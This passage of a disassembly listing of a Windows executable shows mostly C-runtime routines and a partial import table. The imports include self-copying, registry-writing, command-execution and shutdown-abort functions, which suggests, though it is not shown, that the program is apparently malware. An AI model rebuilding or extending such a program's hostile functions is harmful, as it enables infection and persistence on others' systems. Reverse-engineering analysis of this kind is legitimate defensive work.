call HeapFree
loc_40445A: ; CODE XREF: sub_4043C7+30�j
; sub_4043C7+67�j
xor eax, eax
jmp short loc_404475
; ---------------------------------------------------------------------------
loc_40445E: ; CODE XREF: sub_4043C7+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_4070F8
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404475: ; CODE XREF: sub_4043C7+95�j
pop edi
pop esi
retn
sub_4043C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404478 proc near ; CODE XREF: sub_4040BE+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_40448A: ; CODE XREF: sub_404478+19�j
test eax, eax
jl short loc_404493
shl eax, 1
inc ebx
jmp short loc_40448A
; ---------------------------------------------------------------------------
loc_404493: ; CODE XREF: sub_404478+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_4044A8: ; CODE XREF: sub_404478+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4044A8
mov edi, ebx
push 4 ; flProtect
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h ; flAllocationType
push 8000h ; dwSize
push edi ; lpAddress
call VirtualAlloc ; VirtualAlloc
test eax, eax
jnz short loc_4044DB
or eax, 0FFFFFFFFh
jmp loc_40456E
; ---------------------------------------------------------------------------
loc_4044DB: ; CODE XREF: sub_404478+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_404521
lea eax, [edi+10h]
loc_4044E8: ; CODE XREF: sub_404478+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_4044E8
loc_404521: ; CODE XREF: sub_404478+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_40455E
or [eax+4], edi
loc_40455E: ; CODE XREF: sub_404478+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40456E: ; CODE XREF: sub_404478+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404478 endp
; =============== S U B R O U T I N E =======================================
sub_404573 proc near ; CODE XREF: sub_4035C9+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_4070B0, ebx
push esi
push edi
jnz short loc_4045C2
push offset LibFileName ; "user32.dll"
call LoadLibraryA ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4045F8
mov esi, GetProcAddress
push offset ProcName ; "MessageBoxA"
push edi ; hModule
call esi ; GetProcAddress
test eax, eax
mov dword_4070B0, eax
jz short loc_4045F8
push offset aGetactivewindo ; "GetActiveWindow"
push edi ; hModule
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi ; hModule
mov dword_4070B4, eax
call esi ; GetProcAddress
mov dword_4070B8, eax
loc_4045C2: ; CODE XREF: sub_404573+B�j
mov eax, dword_4070B4
test eax, eax
jz short loc_4045E1
call eax ; dword_4070B4
mov ebx, eax
test ebx, ebx
jz short loc_4045E1
mov eax, dword_4070B8
test eax, eax
jz short loc_4045E1
push ebx
call eax ; dword_4070B8
mov ebx, eax
loc_4045E1: ; CODE XREF: sub_404573+56�j
; sub_404573+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_4070B0
loc_4045F4: ; CODE XREF: sub_404573+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4045F8: ; CODE XREF: sub_404573+1C�j
; sub_404573+33�j
xor eax, eax
jmp short loc_4045F4
sub_404573 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404600 proc near ; CODE XREF: sub_4035C9+C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_404683
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_404624
shr ecx, 2
jnz short loc_404691
jmp short loc_404645
; ---------------------------------------------------------------------------
loc_404624: ; CODE XREF: sub_404600+1B�j
; sub_404600+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_404652
test al, al
jz short loc_40465A
test esi, 3
jnz short loc_404624
mov ebx, ecx
shr ecx, 2
jnz short loc_404691
loc_404640: ; CODE XREF: sub_404600+8F�j
and ebx, 3
jz short loc_404652
loc_404645: ; CODE XREF: sub_404600+22�j
; sub_404600+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40467E
dec ebx
jnz short loc_404645
loc_404652: ; CODE XREF: sub_404600+2B�j
; sub_404600+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40465A: ; CODE XREF: sub_404600+2F�j
test edi, 3
jz short loc_404674
loc_404662: ; CODE XREF: sub_404600+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4046F6
test edi, 3
jnz short loc_404662
loc_404674: ; CODE XREF: sub_404600+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4046E7
loc_40467B: ; CODE XREF: sub_404600+7F�j
; sub_404600+F4�j
mov [edi], al
inc edi
loc_40467E: ; CODE XREF: sub_404600+4D�j
dec ebx
jnz short loc_40467B
pop ebx
pop esi
loc_404683: ; CODE XREF: sub_404600+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_404689: ; CODE XREF: sub_404600+A9�j
; sub_404600+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_404640
loc_404691: ; CODE XREF: sub_404600+20�j
; sub_404600+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_404689
test dl, dl
jz short loc_4046DB
test dh, dh
jz short loc_4046D1
test edx, 0FF0000h
jz short loc_4046C7
test edx, 0FF000000h
jnz short loc_404689
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046C7: ; CODE XREF: sub_404600+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_404600+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046DB: ; CODE XREF: sub_404600+AD�j
xor edx, edx
mov [edi], edx
loc_4046DF: ; CODE XREF: sub_404600+C5�j
; sub_404600+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4046F1
loc_4046E7: ; CODE XREF: sub_404600+79�j
xor eax, eax
loc_4046E9: ; CODE XREF: sub_404600+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4046E9
loc_4046F1: ; CODE XREF: sub_404600+E5�j
and ebx, 3
jnz short loc_40467B
loc_4046F6: ; CODE XREF: sub_404600+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_404600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4046FE(LCID Locale, DWORD dwMapFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPSTR lpDestStr, int cchDest, UINT CodePage, int)
sub_4046FE proc near ; CODE XREF: sub_403AE6+BE�p
; sub_403AE6+E6�p
var_28 = dword ptr -28h
lpSrcStr = dword ptr -24h
var_20 = dword ptr -20h
cchSrc = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
Locale = dword ptr 8
dwMapFlags = dword ptr 0Ch
lpMultiByteStr = dword ptr 10h
cbMultiByte = dword ptr 14h
lpDestStr = dword ptr 18h
cchDest = dword ptr 1Ch
CodePage = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405470
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_4070DC, edi
jnz short loc_404774
push edi ; cchDest
push edi ; lpDestStr
push 1
pop ebx
push ebx ; cchSrc
push offset SrcStr ; lpSrcStr
mov esi, 100h
push esi ; dwMapFlags
push edi ; Locale
call LCMapStringW ; LCMapStringW
test eax, eax
jz short loc_404752
mov dword_4070DC, ebx
jmp short loc_404774
; ---------------------------------------------------------------------------
loc_404752: ; CODE XREF: sub_4046FE+4A�j
push edi ; cchDest
push edi ; lpDestStr
push ebx ; cchSrc
push offset byte_406F38 ; lpSrcStr
push esi ; dwMapFlags
push edi ; Locale
call LCMapStringA ; LCMapStringA
test eax, eax
jz loc_40488C
mov dword_4070DC, 2
loc_404774: ; CODE XREF: sub_4046FE+2E�j
; sub_4046FE+52�j
cmp [ebp+cbMultiByte], edi
jle short loc_404789
push [ebp+cbMultiByte]
push [ebp+lpMultiByteStr]
call sub_404922
pop ecx
pop ecx
mov [ebp+cbMultiByte], eax
loc_404789: ; CODE XREF: sub_4046FE+79�j
mov eax, dword_4070DC
cmp eax, 2
jnz short loc_4047B0
push [ebp+cchDest] ; cchDest
push [ebp+lpDestStr] ; lpDestStr
push [ebp+cbMultiByte] ; cchSrc
push [ebp+lpMultiByteStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringA ; LCMapStringA
jmp loc_40488E
; ---------------------------------------------------------------------------
loc_4047B0: ; CODE XREF: sub_4046FE+93�j
cmp eax, 1
jnz loc_40488C
cmp [ebp+CodePage], edi
jnz short loc_4047C6
mov eax, dword_4070D4
mov [ebp+CodePage], eax
loc_4047C6: ; CODE XREF: sub_4046FE+BE�j
push edi ; cchWideChar
push edi ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
mov ebx, eax
mov [ebp+cchSrc], ebx
cmp ebx, edi
jz loc_40488C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+lpSrcStr], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_404821
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+lpSrcStr], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+cchSrc]
loc_404821: ; CODE XREF: sub_4046FE+10E�j
cmp [ebp+lpSrcStr], edi
jz short loc_40488C
push ebx ; cchWideChar
push [ebp+lpSrcStr] ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 1 ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
test eax, eax
jz short loc_40488C
push edi ; cchDest
push edi ; lpDestStr
push ebx ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringW ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40488C
test byte ptr [ebp+dwMapFlags+1], 4
jz short loc_4048A0
cmp [ebp+cchDest], edi
jz loc_40491B
cmp esi, [ebp+cchDest]
jg short loc_40488C
push [ebp+cchDest] ; cchDest
push [ebp+lpDestStr] ; lpDestStr
push ebx ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringW ; LCMapStringW
test eax, eax
jnz loc_40491B
loc_40488C: ; CODE XREF: sub_4046FE+66�j
; sub_4046FE+B5�j ...
xor eax, eax
loc_40488E: ; CODE XREF: sub_4046FE+AD�j
; sub_4046FE+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4048A0: ; CODE XREF: sub_4046FE+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4048D4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4048D4: ; CODE XREF: sub_4046FE+1C2�j
cmp ebx, edi
jz short loc_40488C
push esi ; cchDest
push ebx ; lpDestStr
push [ebp+cchSrc] ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringW ; LCMapStringW
test eax, eax
jz short loc_40488C
cmp [ebp+cchDest], edi
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
jnz short loc_4048FB
push edi
push edi
jmp short loc_404901
; ---------------------------------------------------------------------------
loc_4048FB: ; CODE XREF: sub_4046FE+1F7�j
push [ebp+cchDest] ; cbMultiByte
push [ebp+lpDestStr] ; lpMultiByteStr
loc_404901: ; CODE XREF: sub_4046FE+1FB�j
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 220h ; dwFlags
push [ebp+CodePage] ; CodePage
call WideCharToMultiByte ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40488C
loc_40491B: ; CODE XREF: sub_4046FE+165�j
; sub_4046FE+188�j
mov eax, esi
jmp loc_40488E
sub_4046FE endp
; =============== S U B R O U T I N E =======================================
sub_404922 proc near ; CODE XREF: sub_4046FE+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_40493F
loc_404932: ; CODE XREF: sub_404922+1B�j
cmp byte ptr [eax], 0
jz short loc_40493F
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_404932
loc_40493F: ; CODE XREF: sub_404922+E�j
; sub_404922+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_40494A
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40494A: ; CODE XREF: sub_404922+21�j
mov eax, edx
retn
sub_404922 endp
; =============== S U B R O U T I N E =======================================
sub_40494D proc near ; CODE XREF: sub_403CC8+1F�p
arg_0 = dword ptr 4
mov eax, dword_4070E4
test eax, eax
jz short loc_404965
push [esp+arg_0]
call eax ; dword_4070E4
test eax, eax
pop ecx
jz short loc_404965
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404965: ; CODE XREF: sub_40494D+7�j
; sub_40494D+12�j
xor eax, eax
retn
sub_40494D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404970 proc near ; CODE XREF: sub_403D93+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404990
cmp edi, eax
jb loc_404B08
loc_404990: ; CODE XREF: sub_404970+16�j
test edi, 3
jnz short loc_4049AC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
loc_4049AC: ; CODE XREF: sub_404970+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4049C4
and eax, 3
add ecx, eax
jmp dword ptr loc_4049CC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4049C4: ; CODE XREF: sub_404970+46�j
jmp dword ptr loc_404AC8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4049CC: ; CODE XREF: sub_404970+31�j
; sub_404970+8E�j ...
jmp off_404A4C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4049E0
dd offset loc_404A0C
dd offset loc_404A30
; ---------------------------------------------------------------------------
loc_4049E0: ; DATA XREF: sub_404970+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404A0C: ; DATA XREF: sub_404970+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404A30: ; DATA XREF: sub_404970+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404A4C dd offset loc_404AAF ; DATA XREF: sub_404970:loc_4049CC�r
dd offset loc_404A9C
dd offset loc_404A94
dd offset loc_404A8C
dd offset loc_404A84
dd offset loc_404A7C
dd offset loc_404A74
dd offset loc_404A6C
; ---------------------------------------------------------------------------
loc_404A6C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404A74: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404A7C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404A84: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404A8C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404A94: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404A9C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404AAF: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970:off_404A4C�o
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404AB8 dd offset loc_404AC8 ; DATA XREF: sub_404970+35�r
; sub_404970+92�r ...
dd offset loc_404AD0
dd offset loc_404ADC
dd offset loc_404AF0
; ---------------------------------------------------------------------------
loc_404AC8: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404AD0: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404ADC: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404AF0: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404B08: ; CODE XREF: sub_404970+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404B3C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404B30: ; CODE XREF: sub_404970+1B1�j
; sub_404970+208�j ...
neg ecx
jmp off_404C00[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404B3C: ; CODE XREF: sub_404970+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404B54
and eax, 3
sub ecx, eax
jmp dword ptr loc_404B54+4[eax*4]
; ---------------------------------------------------------------------------
loc_404B54: ; CODE XREF: sub_404970+1D6�j
; DATA XREF: sub_404970+1DD�r
jmp off_404C50[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404B67+1
dd offset loc_404B88
; ---------------------------------------------------------------------------
mov al, 4Bh
inc eax
loc_404B67: ; DATA XREF: sub_404970+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404B88: ; DATA XREF: sub_404970+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404C04
dd offset loc_404C0C
dd offset loc_404C14
dd offset loc_404C1C
dd offset loc_404C24
dd offset loc_404C2C
dd offset loc_404C34
off_404C00 dd offset loc_404C47 ; DATA XREF: sub_404970+1C2�r
; ---------------------------------------------------------------------------
loc_404C04: ; DATA XREF: sub_404970+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404C0C: ; DATA XREF: sub_404970+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_404C14: ; DATA XREF: sub_404970+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404C1C: ; DATA XREF: sub_404970+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_404C24: ; DATA XREF: sub_404970+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404C2C: ; DATA XREF: sub_404970+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_404C34: ; DATA XREF: sub_404970+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404C47: ; CODE XREF: sub_404970+1C2�j
; DATA XREF: sub_404970:off_404C00�o
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404C50 dd offset loc_404C60 ; DATA XREF: sub_404970+1B7�r
; sub_404970:loc_404B54�r ...
dd offset loc_404C68
dd offset loc_404C78
dd offset loc_404C8C
; ---------------------------------------------------------------------------
loc_404C60: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C68: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C78: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C8C: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404970 endp
; ---------------------------------------------------------------------------
align 2
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
align 400h
_text ends
;
; Imports from advapi32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall AbortSystemShutdownA(LPSTR lpMachineName)
extrn AbortSystemShutdownA:dword ; CODE XREF: sub_402029+9B�p
; DATA XREF: sub_402029+9B�r
; LSTATUS __stdcall RegOpenKeyA(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult)
extrn RegOpenKeyA:dword ; CODE XREF: sub_4020D7+96�p
; DATA XREF: sub_4020D7+96�r
; LSTATUS __stdcall RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData)
extrn RegSetValueExA:dword ; CODE XREF: sub_4020D7+BE�p
; DATA XREF: sub_4020D7+BE�r
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_4020D7+C7�p
; DATA XREF: sub_4020D7+C7�r
;
; Imports from kernel32.dll
;
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_404573+12�p
; DATA XREF: sub_404573+12�r
extrn lstrcpy:dword ; CODE XREF: sub_4010D2+76�p
; sub_40127D+8F�p ...
; HFILE __stdcall lclose(HFILE hFile)
extrn _lclose:dword ; CODE XREF: sub_401210+63�p
; StartAddress+2AB�p
; DATA XREF: ...
; __int32 __stdcall hwrite(HFILE hFile, LPCCH lpBuffer, __int32 lBytes)
extrn _hwrite:dword ; CODE XREF: sub_401210+50�p
; sub_401210+60�p
; DATA XREF: ...
; HFILE __stdcall lcreat(LPCSTR lpPathName, int iAttribute)
extrn _lcreat:dword ; CODE XREF: sub_401210+2C�p
; DATA XREF: sub_401210+2C�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_40127D+105�p
; sub_40159E+4D0�p ...
; __int32 __stdcall hread(HFILE hFile, LPVOID lpBuffer, __int32 lBytes)
extrn _hread:dword ; CODE XREF: StartAddress:loc_401D8E�p
; DATA XREF: StartAddress+275�r
; HFILE __stdcall lopen(LPCSTR lpPathName, int iReadWrite)
extrn _lopen:dword ; CODE XREF: StartAddress+259�p
; DATA XREF: StartAddress+259�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: StartAddress+24A�p
; sub_401EF0+F8�p ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: sub_401E65+7B�p
; sub_402029+80�p ...
; UINT __stdcall WinExec(LPCSTR lpCmdLine, UINT uCmdShow)
extrn WinExec:dword ; CODE XREF: sub_401EF0+126�p
; DATA XREF: sub_401EF0+126�r
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_402029+5B�p
; DATA XREF: sub_402029+5B�r
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: sub_402029+18�p
; DATA XREF: sub_402029+18�r
; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName)
extrn CreateMutexA:dword ; CODE XREF: sub_402029+16�p
; sub_402029+59�p
; DATA XREF: ...
; BOOL __stdcall CopyFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists)
